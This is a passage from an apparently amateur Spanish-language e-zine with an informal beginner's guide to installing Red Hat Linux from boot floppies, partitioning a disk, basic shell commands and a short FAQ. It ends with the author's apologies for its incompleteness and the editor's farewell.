cd-rom en el caso de que no 2 tendremo que preparar unos disketes de arraque,
necesitaremos 2 disketes  ya formatiados luego hay que abrir una vetana de MS-DOS
y usando el programa \dosutils\rawrite.exe del cd-rom y copiara los ficheros
\images\boot.img(disco de arranque), \images\supp.img(utilidades suplementarias)
y un ultimo \images\rescue.img(para problemas con las particiones etc..)
(los nombres cambian dependiendo de la distrubucion)
luego de eso cuando esten listos los disketes reinicia el pc y el la pantalla te 
aparecera la secuensia LILO y la presentacion del red haty pulsa "return" para que carge 
el nucleo del sistema operativo linux y...aqui comenzara salir diversos mensajes  que iran 
apareciendo en la pantalla  indican la frase de carga del nucleo del s.o, los diversos 
dispocitivos del hardware y en la parte de seleccion del idioma (layout) del teclado

3-Configuracion del disco duro:

la siguiente tarea consiste en desirle al programa de istalacion donde se va a residir linux 
en el disco duro.
luego de eso te mostrara tus discos y las particiones que esten en tu maquina.
nosotros tendremos que mostrar almenor dos paraticiones en el disco un de arranque (boot)
y otra de intercambio temporal (swap),asignacionde particiones como ejemplo tomaremos un
disco duro de 2 GB
°/dev/hda(disco 1,particion1)win95:900
°/dev/hda(disco 1,particion2)linux:900
°/dev/hda(disco 1,particion3)swap:200
despuez de crear dos particiones extras linux native y linux swap para ello la instalacion nos 
ofrece dos programas DiskDruid o el Fdisk (este ultimo no confundir con el de ms-dos ya 
que este es notablemente superior) y luego sige lo demas.....

4-Comandos basicos:

LINUX           COMENTARIO

chmod		Cambia los permisos de los ficheros.
cd              Para cambiar de directorio.
clear		Para limpiar la pantalla.
cmp		Busca la primera dif. de dos ficheros.
diff		Busca dif. ascii entre dos ficheros.
cp              Copia un fichero.
rm		Borra un fichero.
-h              Ayuda de los comandos.
ls		Muestra lo que hay en un directorio.
echo		Muestra texto en pantalla.
vi		Vi es un editor de texto.
grep		Busca cadenas en un archivo.	
mkdir		Crea un directorio.
more		Para paginar un fichero en pantalla.
lpr             Imprime un archivo.
mv		Cambia el nombre al fichero.
rmdir		Borra un directorio.
rm -R 		Borra un directorio y to lo de dentro.
sort		Ordena el contenido de un fichero.
cat		Muestra el contenido de un fichero.

(hay muchos comandos + pero me da paja ponerme a escribir mas y es mejor que tu los 
decubras)

5-Preguntas mas frecuentes:

-Unidades instaladas?

Es el momentoque nos rebisa el sistema y nos dice todas las
unidades que tenemos instaladas en tu maquina [disco duroc,
cd-rom ...etc].

-Servidor X-windows?

bueno a qui hay que seleccionar el servidor grafico a instalar depende de
la tarjeta grafica que tienes. 

-LILO?

(linux loader)Esta gua nos permite seleccionar la particion que queremos arrancar
y tambien entre los diferentes nucleos que tengamos compilados. 
Hay que selecionar donde quieres instalar tu li..

-X-windows ?

La configurar las X-windows Setiene que aser directamente desde el programa de instalacion 
o ejecutando el Xconfigurator o XF86Setup esa gua depende de que distrubucion tengas
tambiencon respecto a el mouse hay hay que seleccionarlop y de entre
otras cosas es mejor que tengas un manual en mano =)

-kernel ?

Este es el corazon del linux.......puta es muy largo =(


(quiero pedir disculpas por lo miserables que son mis respuestas)

6-Fin:

(aqui esto termina  lo que e escrito es solo un canape y hay muchas partes que e
dejado inconclusas) me falto mucho 
tambien me faltaron los conseptos en relidad me da paja ponerme a escribir 
bueno en fin tal ves en el proximo numero siga( a un que no lo creo ).
Quiero mandar un saludo a FLY_DREMS, y un agrdecimiento a Freedoom que me presto 
un librito muy bueno de linux  y que me ayudo mucho...

Para contactarme: 
 Mi mail: drsolomon@latinmail.com
también en el irc en  el serv irc.terra.cl port 7000 canal #Wannabes ok chao =)
___________________________________________________________________________________
___________________________________________________________________________________
*07*                        Despedida 
                        Por Fran_The_Mentor

Solo me queda decir chao y espero colaboraciones ahora ya la revista esta tomando un
poco de colorcito jejejej

                            IHC BIN DAS BESTE  
___________________________________________________________________________________
___________________________________________________________________________________

           




